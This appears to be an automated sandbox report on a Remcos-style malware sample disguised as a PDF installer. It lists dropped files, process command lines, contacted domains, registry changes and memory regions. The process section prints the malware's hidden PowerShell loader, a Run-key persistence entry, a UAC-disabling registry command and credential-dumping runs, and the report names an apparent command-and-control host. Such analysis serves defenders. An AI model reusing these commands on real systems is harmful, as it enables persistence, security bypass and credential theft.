Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
RFQ24060084#U00b7pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\nsDialogs.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xc741b813, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsstcjge.bga.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wutuq30z.pqy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv1A81.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv322F.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Farvebaandsomskifteren.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Montanes176.opt
|
Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Wafery.unt
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\barsel.pul
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\migraines.sla
|
PGP symmetric key encrypted data - Plaintext or unencrypted data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\tegnmssig.bra
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\tradionsbevarende.unp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Simens.Ice
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 18 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe
|
"C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
"C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ
/d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle
minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"
|
||
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe
|
C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
}a458386d9.duckdns.org
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://geoplugin.net/json.gp%
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://drive.usercontent.google.com/hQ
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://geoplugin.net/json.gphy
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
http://www.imvu.coma
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://geoplugin.net/json.gplr
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gpC
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
https://drive.google.com/Y
|
unknown
|
||
http://geoplugin.net/
|
unknown
|
||
https://g.live.com/odclientsettings/Prod-C:
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2-C:
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
a458386d9.duckdns.org
|
217.76.50.73
|
||
geoplugin.net
|
178.237.33.50
|
||
drive.google.com
|
142.250.186.110
|
||
drive.usercontent.google.com
|
216.58.206.65
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
217.76.50.73
|
a458386d9.duckdns.org
|
Sweden
|
||
142.250.186.110
|
drive.google.com
|
United States
|
||
216.58.206.65
|
drive.usercontent.google.com
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
||
HKEY_CURRENT_USER\Toponymist
|
Berufsverbots
|
||
HKEY_CURRENT_USER\Environment
|
Stableres
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
time
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Preoccupant
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6120000
|
heap
|
page read and write
|
||
60FB000
|
heap
|
page read and write
|
||
BF76000
|
direct allocation
|
page execute and read and write
|
||
6131000
|
heap
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
2236000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
22EFC000
|
heap
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
3239000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
B4014FB000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
2204C000
|
stack
|
page read and write
|
||
1BFC1677000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
21F1000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
963000
|
heap
|
page read and write
|
||
3635000
|
trusted library allocation
|
page execute and read and write
|
||
22C21000
|
direct allocation
|
page execute and read and write
|
||
96C000
|
heap
|
page read and write
|
||
221B000
|
heap
|
page read and write
|
||
21D0000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
1BFC145B000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
6129000
|
heap
|
page read and write
|
||
21D0000
|
heap
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
221C000
|
heap
|
page read and write
|
||
6040000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
6486000
|
heap
|
page read and write
|
||
22C91000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
2F2C000
|
heap
|
page read and write
|
||
2090000
|
heap
|
page read and write
|
||
B4017FE000
|
unkown
|
page readonly
|
||
4F4000
|
heap
|
page read and write
|
||
19E000
|
stack
|
page read and write
|
||
438000
|
unkown
|
page read and write
|
||
21FAE000
|
stack
|
page read and write
|
||
B40237E000
|
stack
|
page read and write
|
||
1BFBD230000
|
trusted library allocation
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
22CB7000
|
heap
|
page read and write
|
||
534000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
6A8000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3610000
|
heap
|
page read and write
|
||
7B10000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
616C000
|
heap
|
page read and write
|
||
2210000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
7625000
|
heap
|
page execute and read and write
|
||
33A0000
|
direct allocation
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
6460000
|
direct allocation
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
6098000
|
heap
|
page read and write
|
||
2227000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
219EE000
|
stack
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
8397000
|
trusted library allocation
|
page read and write
|
||
5DD000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
8DF000
|
stack
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
21D8000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
1BFC167A000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2239000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
B4011FE000
|
unkown
|
page readonly
|
||
401000
|
unkown
|
page execute read
|
||
6176000
|
heap
|
page read and write
|
||
213F000
|
stack
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
26F2000
|
heap
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
91F000
|
stack
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
30FD000
|
stack
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
7B00000
|
direct allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
22CA0000
|
heap
|
page read and write
|
||
2239000
|
heap
|
page read and write
|
||
22A6C000
|
unclassified section
|
page execute and read and write
|
||
34BD000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
26D1000
|
heap
|
page read and write
|
||
2210000
|
heap
|
page read and write
|
||
3606000
|
remote allocation
|
page execute and read and write
|
||
22D5A000
|
heap
|
page read and write
|
||
2239000
|
heap
|
page read and write
|
||
22E08000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
267E000
|
stack
|
page read and write
|
||
8A00000
|
trusted library allocation
|
page read and write
|
||
CBD000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
224A000
|
heap
|
page read and write
|
||
2218000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
21D5000
|
heap
|
page read and write
|
||
3670000
|
heap
|
page readonly
|
||
221D000
|
heap
|
page read and write
|
||
2244000
|
heap
|
page read and write
|
||
224F000
|
heap
|
page read and write
|
||
2266000
|
heap
|
page read and write
|
||
22CE3000
|
heap
|
page read and write
|
||
612A000
|
heap
|
page read and write
|
||
22C91000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
22F40000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
7B20000
|
heap
|
page read and write
|
||
6F8000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
22D8B000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
550000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
219F000
|
stack
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
B40092B000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
B400FFE000
|
unkown
|
page readonly
|
||
408000
|
unkown
|
page readonly
|
||
544000
|
heap
|
page read and write
|
||
1BFBBE97000
|
heap
|
page read and write
|
||
4006000
|
remote allocation
|
page execute and read and write
|
||
1BFC1600000
|
trusted library allocation
|
page read and write
|
||
8990000
|
trusted library allocation
|
page read and write
|
||
89C0000
|
trusted library allocation
|
page read and write
|
||
6020000
|
heap
|
page read and write
|
||
4A06000
|
remote allocation
|
page execute and read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
221F000
|
heap
|
page read and write
|
||
96C000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
1BFBBE29000
|
heap
|
page read and write
|
||
21E6000
|
heap
|
page read and write
|
||
21F3000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
6184000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
3600000
|
trusted library allocation
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
1BFC1660000
|
remote allocation
|
page read and write
|
||
1BFBBE5B000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
2258000
|
heap
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
B4013FE000
|
unkown
|
page readonly
|
||
21EE000
|
heap
|
page read and write
|
||
22D34000
|
heap
|
page read and write
|
||
A0A000
|
heap
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
4EE000
|
stack
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
3272000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
1BFC12D1000
|
trusted library allocation
|
page read and write
|
||
221C000
|
heap
|
page read and write
|
||
22CCF000
|
heap
|
page read and write
|
||
22CE9000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
6189000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
2225000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
223CE000
|
stack
|
page read and write
|
||
20F8000
|
heap
|
page read and write
|
||
22D9D000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
3660000
|
heap
|
page read and write
|
||
22D29000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
AFD000
|
stack
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
21D8000
|
heap
|
page read and write
|
||
508000
|
heap
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
5C89000
|
trusted library allocation
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
611B000
|
heap
|
page read and write
|
||
21DD000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
7B9E000
|
stack
|
page read and write
|
||
2221000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
28CF000
|
stack
|
page read and write
|
||
3400000
|
direct allocation
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
33D0000
|
direct allocation
|
page read and write
|
||
548E000
|
trusted library allocation
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
2C74000
|
heap
|
page read and write
|
||
2E0F000
|
heap
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
21D9000
|
heap
|
page read and write
|
||
223E000
|
heap
|
page read and write
|
||
532000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
2244000
|
heap
|
page read and write
|
||
69E000
|
stack
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
21EE000
|
heap
|
page read and write
|
||
22F91000
|
heap
|
page read and write
|
||
21E6000
|
heap
|
page read and write
|
||
1BFBBCE0000
|
heap
|
page read and write
|
||
21F70000
|
remote allocation
|
page read and write
|
||
21C80000
|
direct allocation
|
page read and write
|
||
262E000
|
stack
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
21FEF000
|
stack
|
page read and write
|
||
3530000
|
direct allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
21E0000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
1BFC150A000
|
heap
|
page read and write
|
||
6178000
|
heap
|
page read and write
|
||
1BFBBE3F000
|
heap
|
page read and write
|
||
21F4000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
22F0C000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
9DF000
|
stack
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
799E000
|
stack
|
page read and write
|
||
1BFBC71A000
|
heap
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
891E000
|
stack
|
page read and write
|
||
303F000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
2231000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
22A4000
|
heap
|
page read and write
|
||
3550000
|
direct allocation
|
page read and write
|
||
1BFC12B0000
|
trusted library allocation
|
page read and write
|
||
3518000
|
heap
|
page read and write
|
||
1BFC1390000
|
trusted library allocation
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
8EC0000
|
trusted library allocation
|
page read and write
|
||
91F000
|
stack
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
B401A7E000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
6DE000
|
stack
|
page read and write
|
||
6070000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
6470000
|
direct allocation
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
2210000
|
heap
|
page read and write
|
||
1BFBD201000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
61E000
|
stack
|
page read and write
|
||
B4018FB000
|
stack
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
3275000
|
heap
|
page read and write
|
||
4EBE000
|
stack
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
2229000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
22D11000
|
heap
|
page read and write
|
||
220F000
|
heap
|
page read and write
|
||
2235000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7680000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
9776000
|
direct allocation
|
page execute and read and write
|
||
2E0A000
|
heap
|
page read and write
|
||
3158000
|
heap
|
page read and write
|
||
2BCF000
|
stack
|
page read and write
|
||
A4A000
|
heap
|
page read and write
|
||
6114000
|
heap
|
page read and write
|
||
224F000
|
heap
|
page read and write
|
||
B4015FE000
|
unkown
|
page readonly
|
||
B401EFE000
|
unkown
|
page readonly
|
||
7B55000
|
heap
|
page read and write
|
||
540E000
|
stack
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
6136000
|
heap
|
page read and write
|
||
518000
|
heap
|
page read and write
|
||
7A12000
|
heap
|
page read and write
|
||
327D000
|
stack
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
21FC000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
65CA000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
21E0000
|
heap
|
page read and write
|
||
22C97000
|
heap
|
page read and write
|
||
81F000
|
stack
|
page read and write
|
||
7C85000
|
trusted library allocation
|
page read and write
|
||
21E8000
|
heap
|
page read and write
|
||
7B87000
|
heap
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
22CE3000
|
heap
|
page read and write
|
||
21D9000
|
heap
|
page read and write
|
||
21D8000
|
heap
|
page read and write
|
||
221E000
|
heap
|
page read and write
|
||
221F000
|
heap
|
page read and write
|
||
22C90000
|
heap
|
page read and write
|
||
B76000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
8D27000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
2530000
|
heap
|
page read and write
|
||
2F2E000
|
heap
|
page read and write
|
||
2C06000
|
remote allocation
|
page execute and read and write
|
||
2340000
|
trusted library allocation
|
page read and write
|
||
21C50000
|
direct allocation
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
B401F7E000
|
stack
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
6139000
|
heap
|
page read and write
|
||
1BFC14C4000
|
heap
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
36B0000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
21F70000
|
remote allocation
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
8D2F000
|
heap
|
page read and write
|
||
6131000
|
heap
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
22899000
|
unclassified section
|
page execute and read and write
|
||
3438000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
B401FFE000
|
unkown
|
page readonly
|
||
2204000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
B401DFE000
|
unkown
|
page readonly
|
||
2219000
|
heap
|
page read and write
|
||
22CB0000
|
heap
|
page read and write
|
||
22CB7000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
74C0000
|
direct allocation
|
page read and write
|
||
22CEB000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
B400DFE000
|
unkown
|
page readonly
|
||
27D1000
|
heap
|
page read and write
|
||
228B3000
|
unclassified section
|
page execute and read and write
|
||
624000
|
heap
|
page read and write
|
||
21C70000
|
direct allocation
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
21CCE000
|
stack
|
page read and write
|
||
221E000
|
heap
|
page read and write
|
||
21E3000
|
heap
|
page read and write
|
||
8D37000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
222D000
|
heap
|
page read and write
|
||
8877000
|
stack
|
page read and write
|
||
52AD000
|
stack
|
page read and write
|
||
746E000
|
stack
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
7D5E000
|
stack
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
1BFC2000000
|
heap
|
page read and write
|
||
2217000
|
heap
|
page read and write
|
||
8B9C000
|
stack
|
page read and write
|
||
222A000
|
heap
|
page read and write
|
||
2280000
|
heap
|
page read and write
|
||
7DDD000
|
stack
|
page read and write
|
||
D30000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
223E000
|
heap
|
page read and write
|
||
6459000
|
trusted library allocation
|
page read and write
|
||
4CE000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2209000
|
heap
|
page read and write
|
||
2228F000
|
stack
|
page read and write
|
||
2236000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
2268D000
|
stack
|
page read and write
|
||
1BFBBD00000
|
heap
|
